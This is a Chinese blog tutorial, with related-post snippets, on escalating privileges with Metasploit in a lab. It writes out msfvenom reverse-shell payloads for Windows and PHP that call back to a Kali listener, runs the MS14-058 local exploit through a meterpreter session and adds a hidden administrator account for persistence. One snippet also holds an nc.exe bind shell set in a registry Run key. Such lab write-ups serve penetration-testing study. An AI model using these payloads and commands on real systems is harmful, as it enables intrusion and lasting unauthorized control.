使用MSF进行提权(windows提权、linux提权、wesng使用)

已于 2022-05-13 11:12:00 修改
阅读量2.5w 收藏 150
点赞数 29
CC 4.0 BY-SA版权
分类专栏: # 内网&提权&红蓝对抗 文章标签: 安全 web安全 提权 metasploit
于 2021-11-22 19:39:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q20010619/article/details/121478686
本文详细介绍了如何使用Metasploit框架进行Windows和Linux系统的提权与反弹shell操作。在Windows环境中,通过生成payload、上传到靶机、开启监听、利用getsystem模块进行提权。在Linux环境下,利用文件上传漏洞创建反弹shell,然后通过Metasploit进行监听。此外,还介绍了wesng工具用于检查系统缺失补丁,辅助提权。整个过程涵盖了漏洞利用、权限提升和系统信息收集等多个环节。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


文章目录


Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 

/usr/share/metasploit-framework

选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化

主要作用:漏洞验证、漏洞利用、内网渗透等

MSF Windows提权

靶机:

  • Win server2003 + iis(已通过webshell拿到低权限用户)
  • IP:192.168.179.143

攻击机:

  • Kali Linux
  • IP:192.168.179.128

反弹shell

  1. 使用msf生成payload

    在Kali中输入命令进入msf

    msfconsole

    生成payload

    msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.179.128
 lport=12345 -f exe >/var/www/html/s.exe

# lhost 是kali的ip
# lport 是kali监听端口

    image-20211121174310606

    将刚才生成的 s.exe 文件上传到服务器(靶机)C:\RECYCLER\s.exe 目录(因为一般C:\RECYCLER\ 目录都有读写权限)

  2. kali 开启本地监听

    use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.179.128
set lport 12345
exploit

    使用命令可以查看配置情况

    show options

    image-20211122153809861

    image-20211121174518012

  3. 使用webshell执行上传的s.exe文件,发现缺少对象,在windows提权篇说过,这种情况需要上传一个版本匹配的cmd.exe文件到c:\recycler目录

    image-20211122160053783

    执行接收到反弹shell(截图端口有误应为12345)

    image-20211122154942523

    发现只是一个iis用户,需要进行提权操作

提权

Windows 提权 exp 存储文件夹路径

/usr/share/metasploit-framework# cd modules/exploits/windows/local/

常见的提权模块如下:

  1. ms14_058 内核模式驱动程序中的漏洞库能允许远程代码执行
  2. ms16_016 WebDAV 本地提权漏洞(CVE-2016-0051)
  3. ms16_032 MS16-032 Secondary Logon Handle 本地提权漏洞

常用提权命令

  1. sysinfo 查看系统命令
  2. migrate 注入进程
  3. getuid 获取当前用户
  4. getprivs 尽可能提升权限
  5. getsystem 通过各种攻击向量来提升系统用户权限

可以先使用 getsystem 来自动提权,如果失败再手动提权

基础命令

  1. ps 列出进程
  2. sessions 查看会话
  3. background 把session放置后台
  4. sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用
  5. interact id #切换进一个信道
  6. back 返回主界面
  7. shell 得到终端
  8. search搜索模块
  9. show 列模块
  10. info 查看模块信息

接下来进行具体提权过程:

  1. 利用getuid命令查看已经获得的权限,可以看到现在的权限很低,是个user权限(或者进入shell 使用whoami命令查看)。尝试利用getsystem提权,失败

    image-20211122162152004

  2. 输入命令shell进入目标机CMD命令行,再利用systeminfo命令或者通过查询 c:\windows\ 里留下的补丁号.log来看看目标机大概打了哪些补丁

    使用 wesng工具查看缺失补丁或者使用以下两个网站

    安全焦点,其BugTraq是一个出色的漏洞和exploit数据源,可以通过CVE编号,或者产品信息漏洞直接搜索。网址:http://www.securityfocus.com/bid。
    Exploit-DB,取代了老牌安全网站milw0rm。不断更新大量的Exploit程序和报告,它的搜索功能可以搜索整个网站内容。网址:http://www.exploit-db.com。

    使用命令查找

    python .\wes.py -m .\systeminfo.txt

    image-20211122162704936

    发现很多补丁都没有打

  3. 输入命令background,就是把当前的metasploit shell转为后台执行

    使用命令搜索模块

    search ms14_058

    image-20211122163107938

    查看模块信息

    exploit/windows/local/ms14_058_track_popup_menu

    基础选项中看到需要设置一个session

    image-20211122163213958

    use exploit/windows/local/ms14_058_track_popup_menu

    image-20211122163307481

    设置session为刚才back的,使用sessions命令查看id

    image-20211122163405631

    设置session

    set SESSION 3

    image-20211122170050017

    提权成功

保持权限

使用ps命令列出进程

migrate pid 注入explorer 进程

增加超级管理员

net user ocean$ ocean123 /add 
net localground administrators ocean$ /add

在kali里面链接远程终端

rdesktop 192.168.179.128

END推荐阅读

MSF Windows提权 https://xz.aliyun.com/t/258

MSF命令 https://zhuanlan.zhihu.com/p/137061194

MSF Linux提权

方法和windows是一致的

靶机:

  • ubuntu14.04
  • IP:192.168.179.146

攻击机:

  • Kali Linux
  • IP:192.168.179.128

反弹shell

经过测试web中存在文件上传漏洞,然后上传了一句话木马,使用蚁剑链接成功

使用MSF生成payload

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.179.128 LPORT=12345 -f raw > /var/www/html/shell.php

开启监听

use exploit/multi/handler
set payload php/meterpreter_reverse_tcp 
set lhost 192.168.179.128
set lport 12345
exploit

再蚁剑上传shell.php到web目录再浏览器访问

http://192.168.179.146/upload/shell.php

kali接收到反弹的shell

image-20211122173830249

权限为www-data

image-20211122174755703

msf对于Linux提权方式不是很多,还是以手工提权为主

补充wesng用法

项目地址:https://github.com/bitsadmin/wesng

  1. 将wesng下载到本地主机上,先升级最新的漏洞数据库

    python wes.py --update

    image-20211119195337077

  2. 将目标机器的systeminfo命令的结果输出并保存,使用wesng进行检查

    python .\wes.py .\systeminfo.txt

    image-20211119195524788

    如果提示txt文件中有缺失,可以加参数指定系统版本

    -m .\systeminfo.txt --os "winserver 2008 r2"

    wesng也可以对数据进行过滤

    如果攻击者对可能导致远程代码执行的漏洞和/或仅具有可用漏洞利用代码的漏洞感兴趣,这将非常有用。为此,可以分别使用--impact "Remote Code Execution"(shorthand: -i) 和--exploits-only(shorthand: -e) 参数,使用--severity(简写:)-s参数可以仅列出具有特定严重性的结果

    支持使用--output(shorthand: -o) 参数将结果以 CSV 格式存储到磁盘
    Gif animation showing usage of Windows Exploit Suggester - Next Generation
    同样也有针对linux的工具

    https://github.com/mzet-/linux-exploit-suggester

MSF漏洞利用技术详解
CyberXZ的博客
09-28 314
在渗透测试中,漏洞利用是指通过利用系统中存在的漏洞,获取比当前限更高级别的限,例如从普通用户升为管理员限。MSF供了多个模块用于利用已知的漏洞,其中一些常见的模块包括"exploit/windows/local/bypassuac"和"exploit/windows/local/ntdll_uaf"等。在网络安全领域,Metasploit Framework(MSF)是一款广泛使用的渗透测试工具,它供了众多功能强大的模块,可用于发现、验证和利用各种漏洞。MSF漏洞利用实例。
[ 红队知识库 ] Windows & Linux 下常用的扫描辅助工具(含工具下载链接及使用介绍)
qq_51577576的博客
03-16 1032
[ 红队知识库 ] Windows & Linux 下常用的扫描辅助工具(含工具下载链接及使用介绍)
msf】对ubuntu系统进行
qq_20410657的博客
10-08 1611
查询内核漏洞 寻找内核漏洞-匹配 查找到内核漏洞的文件 使用gcc编译内核漏洞执行程序 上传漏洞执行程序到ubuntu系统 进行shell 失败 渗透总结
msf内网
dreamthe的博客
11-22 2526
目录 1.利用木马文件拿到shell 2.利用ms_2018_8120 3.高程序运行级别。 4.基于ms16_016 5.基于ms14_058 ​6.基于ms13_053 7.uac绕过 8.基于ms16_032 1.利用木马文件拿到shell 这里呢我们就不多说了,在上一篇文章里面我进行详细说明和演示。如果有不懂的朋友可以看上一篇的文章,上一篇文章:利用msfvenom生成木马文件反弹shell、meterpreter 简单系统命令_dreamthe的...
MSF命令大全详解
最新发布
yy1715713348的博客
06-28 897
reg setval -k HKLM\software\microsoft\windows\currentversion\run -v lltest_nc -d ‘C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe’ #设置键值。ASP: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口]-f asp > 保存路径/文件名.asp。端口转发是利用的portfwd命令。
【网络安全MSF
一直被模仿,从未被超越
03-15 1355
学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。1、当我们通过MSF成功登录靶机时,进行时如果报如下,表示没有拿到系统限。5、我们找到一个漏洞,注意:这里不是每个漏洞都可以成功,要多试几个。6、再次进行渗透,成功出现meterpreter ,代表成功。3、设置 Session。2、使用本地漏洞模块。
msfWindows
wjq18827615690的博客
03-18 343
利用msf生成payload获取目标机session 利用msf生成payload(可以获得一个低限的session) 生成linux木马 msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.42.49 LPORT=5555 -i 3 -f elf -o test msfvenom -a x86 --platform linux -p linux/x64/meterpreter/..
MSF操作
快吃小蛋糕吧的博客
10-30 1288
最近有个问题苦恼了我很久,“msf”是否可以控制多台服务器,怎么通过“msf”进行操作? 这里我直接开启了两台win7SP1X64的主机,通过运行后门的方式获得shell,这里生成shell的步骤略过。 获得服务器shell 首先我们在kali里面开启msf并调用exploit/multi/handler msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 e.
利用Metasploit进行Linux
01-09
 我们可以通过指令查看msf里的payload 然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,只不过这里生成的是一个网页脚本文件:  产生webshell  msfpayload windows/...
WEB渗透Win篇-MSF
qq_59468567的博客
08-28 288
发现补丁 >use post/windows/gather/enum_patches 列举可用EXP >use post/multi/recon/local_exploit_suggester
常见windwos笔记
03-30
- **至root用户**: 类似于Windows中的概念,在Linux系统中则是将普通用户升至拥有最高限的root用户。 #### 五、常见环境介绍 ##### 5.1 Webshell - **定义**: Webshell是通过Web应用漏洞上传到...
windows 方式汇总
LINGX5的博客
08-25 1222
出发 NTLM 认证机制后,把流量包转到了 kali 主机的 135 端口上,再有 kali 主机上转给 windows 主机的 9999 端口,从而实现了。
[KALI第三章]MSF获取对方system
weixin_45919207的博客
08-29 1330
[KALI第三章]MSF获取对方system限准备初始化并打开MSF开始入侵过程验证是否入侵成功怎样防范KALI系列传送门 准备 攻击机KALI IP 被攻击机Windows server2008 R2 IP 192.168.85.131 192.168.85.130 初始化并打开MSF 注意:首次使用才需初始化 /etc/init.d/postgresql start msfdb init msfconsole 开始 入侵过程 1.我们先使用一个辅助模块 use auxiliary
linux秘籍
失心少年
09-27 1257
uname -a/etc/阴影文件包含用户密码哈希,默认情况下,除root用户外,任何用户都无法读取。如果我们能够读取/etc/shadow文件的内容,我们可能能够破解根用户的密码哈希。如果我们能够修改/etc/shadow文件,我们就可以用一个我们知道的密码散列替换根用户的密码哈希。该文件历来包含的用户密码散列。为了向后兼容,如果/etc/passwd中的用户行的第二个字段包含密码哈希,那么它优先/etc/shadow中的哈希。
Linux
weixin_65582330的博客
03-18 528
linux中,s指的是“强制位限”,位于user或group限组的第三位置。如果以root用户身份运行find命令并使用-exec参数,则不需要添加-p参数来保留限,因为命令将以root用户身份运行。但是,如果你希望以其他用户身份运行执行的命令,则需要使用-p参数来保留限。在kali攻击机上生成一对密钥,查看生成的公钥,把公钥放到靶机中的/~/.ssh目录下面新建的authorized_keys文件中,下次就可以免密码连接。找到指定漏洞可以拿find命令进行搜索,找到利用的路径,编译后可以使用
[升] Linux — 系统内核溢出漏洞
Blue17 の 小窝
02-05 1701
注意:很容易让系统崩溃,所以如果是测试的话,前最好做好系统备份。Linux 系统内核溢出漏洞与之前的Windows 内核溢出漏洞原理都差不多,都是通过内核漏洞进行的,内核漏洞一般都是专门研究这些的专家发现的,我们这些小卡拉米会用就行了(后面自学一下也未尝不可)。利用内核漏洞进行的基本流程如下:对目标系统进行信息收集,获取到系统内核信息以及版本信息。根据内核版本获取其对应的漏洞以及 EXP。使用找到的 EXP 对目标系统发起攻击,完成操作。
Windows---MSF/令牌窃取/系统服务限配置错误
qq_40012781的博客
07-02 2512
是指把普通用户的限进行升至高限的过程,也叫特
118.网络安全渗透测试—[升篇16]—[Windows MSF模块&审计工具]
qwsn
07-08 5027
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! (1)生成攻击载核:(2)msf开启监听: (3)利用文件上传的MIME白名单类型突破,上传了up.aspx大马,然后上传64.exe并执行,后得到一个低限的shell: (4)当前session下执行漏洞检测模块: #这里没有扫描到漏洞,可以换个方法扫描 当然了也可以指定session进行漏洞检测: (5)挂起session,在Metasploit控制台下search搜索2008 #根据关键字搜索,晒选结果中loc
MSFPC半自动化生成强大的木马Payload
dongxieaitonglao的博客
03-16 1756
MSFPC=MSFvenom Payload Creator 客户端访问该IP,并下载木马。(前没有防火墙) 监听端linux 运行配置脚本(批量配置) 在被攻击端点击木马,会话即建立。 选择一个会话进入的命令 sessions -i 1 ...
msf进行linux
11-06
使用Msf进行Linux的基本步骤如下: 1. **连接目标主机**:首先,你需要通过Msf的exploit模块找到合适的漏洞利用payload,并使用`meterpreter/reverse_tcp`或其他类型的监听端口建立连接。 ```bash use exploit...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

NaecoYes

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值